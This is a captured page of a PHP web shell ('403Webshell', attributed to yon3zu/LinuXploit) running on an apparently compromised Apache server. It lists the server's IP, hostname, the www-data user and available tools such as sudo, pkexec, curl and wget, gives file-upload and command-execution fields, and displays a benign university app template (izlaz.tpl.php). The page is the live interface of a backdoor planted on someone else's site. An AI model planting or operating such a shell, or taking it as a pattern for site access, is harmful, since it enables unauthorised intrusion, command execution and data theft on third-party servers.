403Webshell
Server IP : 93.86.61.54  /  Your IP : 216.73.216.60
Web Server : Apache/2.4.62 (Ubuntu)
System : Linux rasin.ddns.net 6.8.0-124-generic #124~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 21:05:19 UTC x86_64
User : www-data ( 33)
PHP Version : 8.4.22
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/projects/cslinfo/templates/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/projects/cslinfo/templates//izlaz.tpl.php
<?php
/**
* Sablon stranice za izlaz iz aplikacije (AIR) ili redirekciju na glavnu stranicu (browser).
* 
* @package CSLInfo
* @subpackage Sablon
* @category Pregled
* @author Marina Terzic <terzic.marina@gmail.com>
* @copyright Laboratorija za racunarsku tehniku, Tehnicki fakultet Cacak <csl@tfc.kg.ac.rs>
*/

/*
* Zastita od direktnog pristupa sablonu
*/
if(!defined('CSL_OK')){
	header('Location: index.php');	
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>CSL Info</title>
<link href="css/style.css" rel="stylesheet" type="text/css" />
<script type="text/javascript">
window.onload = function(){
	try {
		parentSandboxBridge.airIzlaz();
	} catch (e) {
		window.location = 'index.php';	
	}
}
</script>
</head>
<body>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit